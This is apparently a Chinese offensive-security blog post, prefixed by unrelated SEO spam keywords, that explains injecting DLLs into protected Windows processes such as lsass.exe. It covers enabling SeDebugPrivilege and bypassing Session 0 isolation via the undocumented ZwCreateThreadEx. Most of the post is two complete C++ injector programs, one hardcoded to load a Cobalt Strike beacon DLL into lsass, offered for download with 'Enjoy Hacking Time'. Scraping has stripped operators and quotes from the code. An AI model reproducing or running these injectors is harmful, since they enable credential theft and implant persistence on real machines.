天津河西做网站,贵港网站建设代理,西部域名网,用来做网页的软件刚更新完上一篇#xff0c;于是我们就马不停蹄的去跟新下一篇#xff01;#xff01; Session0注入 #xff1a;#xff1a; 各位看官如果觉得还不错的可以给博主点个赞#x1f495;#x1f495;
这次#xff0c;我把这个脚本直接传到Github上了 喜欢的师傅点个Star噢…刚更新完上一篇于是我们就马不停蹄的去跟新下一篇 Session0注入 各位看官如果觉得还不错的可以给博主点个赞
这次我把这个脚本直接传到Github上了 喜欢的师傅点个Star噢 (❤ ω ❤)
whoami-juruo/DLLInjectTools: 一款集成了窃取令牌和从Session0和3进行DLL注入的工具。 (github.com)https://github.com/whoami-juruo/DLLInjectTools?tabreadme-ov-file
目录
1.注不了系统进程
2.Session0隔离
3.Getsystem? ✔✔
4.Session0注入
CreateRemoteThread 1.注不了系统进程
我上一篇的Blog提供了一个DLL注入的脚本当时我们注入的是Notepad这个普通进程不过这不是我们想要的啊 哈哈哈哈让我再引用一下我上一篇Blog 那我们尝试来注入一下Lsass进程 Lsass进程可是一个系统进程我们电脑的明文密码就写在了这个进程里面这个我之前讲过如果好奇的可以看看我以前的Blog 那么我们尝试注入一下 好家伙直接连句柄都获取不了 那么我们以管理员的身份开启一下CMD来注入一下过一下UAC看看
还是连句柄都获取不了所以我们就要换代码 2.Session0隔离
首先我们来了解一下什么是Session0 在计算机领域中Session 0 是指操作系统中运行的系统级别会话。具体来说它通常指的是 Windows 操作系统中的服务会话。 更好的解释就是 在 Windows 中用户登录后会创建一个交互式会话Interactive Session这是用户可以看到和操作的桌面环境。然而有一些服务和系统进程不需要用户交互式桌面它们在一个不可见的系统级别会话中运行这个会话被称为 Session 0。 那么为什么我们就算是管理员也注入不了Lsass进程呢? 权限不足即使你以管理员权限运行仍然可能无法对 lsass.exe 进行 DLL 注入。这是因为管理员权限虽然可以进行许多操作但某些系统关键进程可能需要更高级别的特权或专门的权限才能进行修改. 其中上面提到的更高级别的特权或者专门的权限就是System权限 但是其实如果我们能过UAC或者是administrator的话就已经是SYSTEM了
3.Getsystem? ✔✔
我相信大家一定在提权的时候无论是在CSMSF上都试过直接Getsystem 那么它的原理是什么呢 其实就是窃取令牌我在在内网的权限提升的时候讲过 只有administrator或者过了UAC的普通管理员才能窃取SYSTEM令牌 不信我们来试试我们分别上线一个没过UAC和一个过了UAC的普通管理员 *代表过了UAC
然后我们先用普通管理员进行Getsysten
可以看见直接Failed了 那么我们去过了UAC的管理员那里Getsystem试一下 这时候我们就是SYSTEM权限 其实它就是通过下面这段代码来窃取令牌提权
BOOL EnableDebugPrivilege()
{
HANDLE hToken;
BOOL fOk FALSE;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, tp.Privileges[0].Luid);
tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);
fOk (GetLastError() ERROR_SUCCESS);
CloseHandle(hToken);
}
return fOk;
}
对于SYSTEM权限我们是可以随便注入的 不信我们在我们的脚本上面插入这个提权脚本
#includeiostream
#includetchar.h
#includeWindows.h
#includeTlhelp32.h
using namespace std;
#pragma comment(linker, /section:.data,RWE)BOOL EnableDebugPrivilege()
{HANDLE hToken;BOOL fOk FALSE;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)){TOKEN_PRIVILEGES tp;tp.PrivilegeCount 1;LookupPrivilegeValue(NULL, SE_DEBUG_NAME, tp.Privileges[0].Luid);tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);fOk (GetLastError() ERROR_SUCCESS);CloseHandle(hToken);}return fOk;
}DWORD GetProcessPID(LPCTSTR lpProcessName)
{DWORD Ret 0;PROCESSENTRY32 p32;HANDLE lpSnapshot ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (lpSnapshot INVALID_HANDLE_VALUE){printf( [-] 获取进程快照失败,请重试! Error:%d, ::GetLastError());return Ret;}p32.dwSize sizeof(PROCESSENTRY32);::Process32First(lpSnapshot, p32);do {if (!lstrcmp(p32.szExeFile, lpProcessName)){Ret p32.th32ProcessID;break;}} while (::Process32Next(lpSnapshot, p32));::CloseHandle(lpSnapshot);return Ret;
}void DLLInject(DWORD pid,LPCWSTR dllpath)
{//1.获取句柄HANDLE OriginalProcessHandle OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);if (OriginalProcessHandle NULL){cout [-] Get TargetProcessHandle Failed :( endl;if (EnableDebugPrivilege() TRUE){cout [-] Is This EXE Opened? :( endl;}else {cout [-] Please Run This Under Administrator Role :( endl;}return;}else {cout [*] Get OriginalProcessHandle Successfully :) endl;}//2.远程申请内存DWORD length (wcslen(dllpath) 1) * sizeof(TCHAR);PVOID RemoteMemory VirtualAllocEx(OriginalProcessHandle, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (RemoteMemory NULL){cout [-] VirtualAlloc Address Failed :( endl;return;}else {cout [*] VirtualAlloc Address Successfully :) endl;} //3.将CS上线的DLL写入内存BOOL WriteStatus WriteProcessMemory(OriginalProcessHandle,RemoteMemory,dllpath,length,NULL);if (WriteStatus 0){cout [-] Write CSs DLL Into Memory Failed :( endl;return;}else{cout [*] Write CSs DLL Into Memory Successfully :) endl;}//4.获取LoadLibrary地址FARPROC FunctionHandle GetProcAddress(GetModuleHandle(Lkernel32.dll), LoadLibraryW);//5.创建线程HANDLE RemoteHandle CreateRemoteThread(OriginalProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)FunctionHandle, RemoteMemory,0,NULL);if (RemoteHandle NULL){cout [-] Create Remote Thread Failed :( endl;return;}else {cout [*] Create Remote Thread Successfully :) endl;}//6.等待线程结束WaitForSingleObject(RemoteHandle, -1);//7.释放DLL空间VirtualFreeEx(OriginalProcessHandle, RemoteMemory, length, MEM_COMMIT);//8.关闭句柄CloseHandle(OriginalProcessHandle);cout [*] DLL injct successfu11y !! Enj0y Hacking Time :) ! endl;
}int main()
{HANDLE hConsole GetStdHandle(STD_OUTPUT_HANDLE);SetConsoleTextAttribute(hConsole, FOREGROUND_GREEN); cout endl Under the sun,there is no secure system!!endl Scripted By Whoami127.0.0.1 :》 endl;if (EnableDebugPrivilege() TRUE){cout -----------------------------!!START!!-------------------------------- endl;cout [*] Privilege Elevated Successfully, Now You Have Bypassed UAC :) endl;}else {cout -----------------------------!!START!!-------------------------------- endl;cout [-] Privilege Elevated Failed, You Havent Bypassed UAC :( endl;}DWORD PID GetProcessPID(Llsass.exe); //必须小写DLLInject(PID, LC:\\Users\\ASUS\\Desktop\\inject.dll);return 0;
}
然后我们直接以管理员权限运行当然你的DLL得写绝对路径) 4.Session0注入
上面的方法确实可以注入高权限的进程但是不是我们今天的主题捏 我们今天的主题是Session0的注入虽然说Session0注入也是要提升到System权限但是这两个注入是有本质区别的 所以我们还是开始我们今天的Session0注入吧
CreateRemoteThread
我们众所周知我们的CreateRemoteThread这个函数他是这样进入0环的
在64位下首先将他扩展成CreateRemoteThreadStub八个参数然后去到KernelBase.dll中寻找CreateRemoteThreadEx这个API再通过一众的跳步之后我们就在NTdll中找到NTCreateThreadEx这个最终的API然后直接通过SysCall进入内核层再去SSDT表
所以我们就可以直接用一个更加底层的函数 ZwCreateThreadEx 研究发现CreateRemoteThread底层会调用内核函数ZwCreateThreadEx而系统调用此函数时如果发现时系统进程会把函数的第七个参数CreateSuspended设置为1导致线程创建完成后会一直处于挂起状态无法恢复运行导致注入失败。所以我们可以手动调用ZwCreateThread这一内核函数 其中ZwCreateThreadEx是一个未文档化的API所以我们需要手动声明
#ifdef _WIN64
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
ULONG CreateThreadFlags,
SIZE_T ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
LPVOID pUnkown);
#else
typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
PHANDLE ThreadHandle,
ACCESS_MASK DesiredAccess,
LPVOID ObjectAttributes,
HANDLE ProcessHandle,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
BOOL CreateSuspended,
DWORD dwStackSize,
DWORD dw1,
DWORD dw2,
LPVOID pUnkown);
所以其实我们的流程都是差不多的只不过要转换函数罢了这我们就对昨天的代码直接进行更改了我想偷懒
#includeiostream
#includetchar.h
#include cstring
#includeWindows.h
#includeTlhelp32.h
#include cctype
using namespace std;
#pragma comment(linker, /section:.data,RWE)BOOL EnableDebugPrivilege()
{HANDLE hToken;BOOL fOk FALSE;if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)){TOKEN_PRIVILEGES tp;tp.PrivilegeCount 1;LookupPrivilegeValue(NULL, SE_DEBUG_NAME, tp.Privileges[0].Luid);tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);fOk (GetLastError() ERROR_SUCCESS);CloseHandle(hToken);}return fOk;
}DWORD GetProcessPID(LPCTSTR lpProcessName)
{DWORD Ret 0;PROCESSENTRY32 p32;HANDLE lpSnapshot ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (lpSnapshot INVALID_HANDLE_VALUE){printf( [-] 获取进程快照失败,请重试! Error:%d, ::GetLastError());return Ret;}p32.dwSize sizeof(PROCESSENTRY32);::Process32First(lpSnapshot, p32);do {if (!lstrcmp(p32.szExeFile, lpProcessName)){Ret p32.th32ProcessID;break;}} while (::Process32Next(lpSnapshot, p32));::CloseHandle(lpSnapshot);return Ret;
}void DLLInject(DWORD pid, LPCWSTR dllpath)
{//1.获取句柄HANDLE OriginalProcessHandle OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);if (OriginalProcessHandle NULL){cout [-] Get TargetProcessHandle Failed :( endl;if (EnableDebugPrivilege() TRUE){cout [-] Is This EXE Opened? :( endl;}else {cout [-] Please Run This Under Administrator Role :( endl;}return;}else {cout [*] Get OriginalProcessHandle Successfully :) endl;}//2.远程申请内存DWORD length (wcslen(dllpath) 1) * sizeof(TCHAR);PVOID RemoteMemory VirtualAllocEx(OriginalProcessHandle, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (RemoteMemory NULL){cout [-] VirtualAlloc Address Failed :( endl;return;}else {cout [*] VirtualAlloc Address Successfully :) endl;}//3.将CS上线的DLL写入内存BOOL WriteStatus WriteProcessMemory(OriginalProcessHandle, RemoteMemory, dllpath, length, NULL);if (WriteStatus 0){cout [-] Write CSs DLL Into Memory Failed :( endl;return;}else{cout [*] Write CSs DLL Into Memory Successfully :) endl;}//4.获取LoadLibrary地址FARPROC LoadLibraryHandle GetProcAddress(GetModuleHandle(Lkernel32.dll), LoadLibraryW);//5.声明ZwCreateThreadEx函数
#ifdef _WIN64typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,ULONG CreateThreadFlags,SIZE_T ZeroBits,SIZE_T StackSize,SIZE_T MaximumStackSize,LPVOID pUnkown);
#elsetypedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(PHANDLE ThreadHandle,ACCESS_MASK DesiredAccess,LPVOID ObjectAttributes,HANDLE ProcessHandle,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,BOOL CreateSuspended,DWORD dwStackSize,DWORD dw1,DWORD dw2,LPVOID pUnkown);
#endif//6.获取NTDLL中ZwCreateThreadEx函数typedef_ZwCreateThreadEx ZwCreateThreadEx (typedef_ZwCreateThreadEx)GetProcAddress(GetModuleHandle(Lntdll.dll), ZwCreateThreadEx);if (ZwCreateThreadEx NULL){cout [-] Get ZwCreateThreadEx Address Failed :( endl;return;}else {cout [*] Get ZwCreateThreadEx Address Successfully :) endl;}//5.创建线程 ring3调用CreateRemoteThreadHANDLE RemoteHandle CreateRemoteThread(OriginalProcessHandle, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryHandle, RemoteMemory, 0, NULL);if (RemoteHandle NULL){cout [-] Ring3 Thread Inject Failed :( endl;return;}else {cout [*] Ring3 Thread Inject Successfully :) endl;}//7.创建线程 ring0调用ZwCreateThreadExHANDLE hRemoteThread;DWORD Status 0;Status ZwCreateThreadEx(hRemoteThread, PROCESS_ALL_ACCESS, NULL, OriginalProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryHandle, RemoteMemory, 0, 0, 0, 0, NULL);if (Status NULL){cout [*] Ring0 Thread Inject Successfully :) endl;}else{cout [-] Ring0 Thread Inject Failed :( endl;return;}WaitForSingleObject(RemoteHandle, -1);//8.释放DLL空间VirtualFreeEx(OriginalProcessHandle, RemoteMemory, length, MEM_COMMIT);//9.关闭句柄CloseHandle(OriginalProcessHandle);CloseHandle(ZwCreateThreadEx);cout [*] DLL injct successfu11y !! Enj0y Hacking Time :) ! endl;
}int _tmain(int argc, TCHAR* argv[])
{HANDLE hConsole GetStdHandle(STD_OUTPUT_HANDLE);SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_BLUE);if (argc 3) {std::cout ▓█████▄ ██▓ ██▓ ██▓ ███▄ █ ▄▄▄██▓▓▓▓█████ ▄████▄ ▄▄▄█████▓\n;std::cout ▓██▓ ██▌▓██▓ ▓██▓ ▓██▓ ██ ▓█ █ ▓██ ▓█ ▓ ▓██▓ ▓█ ▓ ██▓ ▓▓\n;std::cout ▓██ █▌▓██▓ ▓██▓ ▓██▓▓██ ▓█ ██▓ ▓██ ▓███ ▓▓█ ▄ ▓ ▓██▓ ▓▓\n;std::cout ▓▓█▄ ▌▓██▓ ▓██▓ ▓██▓▓██▓ ▓▌██▓▓██▄██▓ ▓▓█ ▄ ▓▓▓▄ ▄██▓▓ ▓██▓ ▓ \n;std::cout ▓▓████▓ ▓██████▓▓██████▓▓██▓▓██▓ ▓██▓ ▓███▓ ▓▓████▓▓ ▓███▓ ▓ ▓██▓ ▓ \n;std::cout ▓▓ ▓ ▓ ▓▓▓ ▓▓ ▓▓▓ ▓▓▓ ▓ ▓▓ ▓ ▓ ▓▓▓▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓ ▓ ▓ ▓▓ \n;std::cout ▓▓ ▓ ▓ ▓ ▓ ▓▓ ▓ ▓ ▓ ▓ ▓▓ ▓▓ ▓ ▓▓ ▓ ▓▓▓ ▓ ▓ ▓ ▓ ▓ ▓ \n;std::cout ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ \n;std::cout ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓▓ ▓ \n;std::cout ▓ ▓ \n;SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);cout endl Under the sun,there is no secure system!! endl Scripted By Whoami127.0.0.1 :》endl Color Picked By Icy Water :) endl;if (EnableDebugPrivilege() TRUE){//cout -----------------------------!!START!!-------------------------------- endl;cout [*] Privilege Elevated Successfully, Now You Have Bypassed UAC :) endl;}else {cout -----------------------------!!START!!-------------------------------- endl;cout [-] Privilege Elevated Failed, You Havent Bypassed UAC :( endl;}DWORD PID GetProcessPID(argv[1]); //必须小写DLLInject(PID, argv[2]);}else{cout [-] Two Parameters are required endl;}return 0;
}
这里小编也把扔到Github上了如果喜欢的兄弟萌也可以下来玩一玩噢
